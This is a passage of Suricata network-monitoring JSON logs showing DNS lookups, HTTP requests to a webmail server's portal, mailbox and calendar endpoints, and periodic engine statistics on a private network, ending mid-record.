{"timestamp":"2020-02-29T00:10:57.000554+0000","flow_id":787811538317011,"event_type":"flow","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.863955+0000","end":"2020-02-29T00:05:56.972258+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:57.000755+0000","flow_id":1544546121178258,"event_type":"flow","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.679058+0000","end":"2020-02-29T00:05:56.787069+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:58.000714+0000","flow_id":1083094850400979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1161,"bytes_toclient":6515,"start":"2020-02-29T00:09:52.520915+0000","end":"2020-02-29T00:09:57.718896+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:59.000187+0000","event_type":"stats","stats":{"uptime":14311,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2723,"new_pruned":15,"est_pruned":2348,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:06.000234+0000","event_type":"stats","stats":{"uptime":14318,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:13.000300+0000","event_type":"stats","stats":{"uptime":14325,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:13.001675+0000","flow_id":922471664245492,"event_type":"flow","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":12,"bytes_toserver":2881,"bytes_toclient":6890,"start":"2020-02-29T00:10:04.252660+0000","end":"2020-02-29T00:10:12.397842+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:13.403835+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60620,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:13.675680+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917}} {"timestamp":"2020-02-29T00:11:17.000266+0000","flow_id":1979596258201268,"event_type":"flow","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1293,"bytes_toclient":8017,"start":"2020-02-29T00:09:40.904884+0000","end":"2020-02-29T00:10:16.599822+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:18.677072+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44800,"tx_id":0}} {"timestamp":"2020-02-29T00:11:18.863063+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42665,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.028862+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:11:19.245557+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":0}} {"timestamp":"2020-02-29T00:11:19.256442+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34464,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.435239+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:11:19.437553+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955}} {"timestamp":"2020-02-29T00:11:20.000581+0000","event_type":"stats","stats":{"uptime":14332,"capture":{"kernel_packets":134594,"kernel_drops":0},"decoder":{"pkts":134594,"bytes":92874547,"invalid":185,"ipv4":133109,"ipv6":8,"ethernet":134594,"raw":0,"null":0,"sll":0,"tcp":127877,"udp":5032,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2743,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2759,"synack":2750,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1783,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2297,"failed_udp":111},"tx":{"http":4593,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2376}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":84300,"memcap":0}}} {"timestamp":"2020-02-29T00:11:22.863642+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26215,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:11:24.438797+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":1}} {"timestamp":"2020-02-29T00:11:26.519207+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2913,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:11:27.000184+0000","event_type":"stats","stats":{"uptime":14339,"capture":{"kernel_packets":134631,"kernel_drops":0},"decoder":{"pkts":134632,"bytes":92889142,"invalid":185,"ipv4":133147,"ipv6":8,"ethernet":134632,"raw":0,"null":0,"sll":0,"tcp":127911,"udp":5036,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2744,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2760,"synack":2751,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1785,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2299,"failed_udp":111},"tx":{"http":4595,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2378}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":78960,"memcap":0}}} {"timestamp":"2020-02-29T00:11:28.014904+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34794,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.000765+0000","flow_id":1641341801378157,"event_type":"flow","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:30.700781+0000","end":"2020-02-29T00:06:30.811812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:31.702838+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.748325+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13638,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:32.000674+0000","flow_id":1124421027940285,"event_type":"flow","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:10:26.051133+0000","end":"2020-02-29T00:10:31.236100+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:32.016594+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 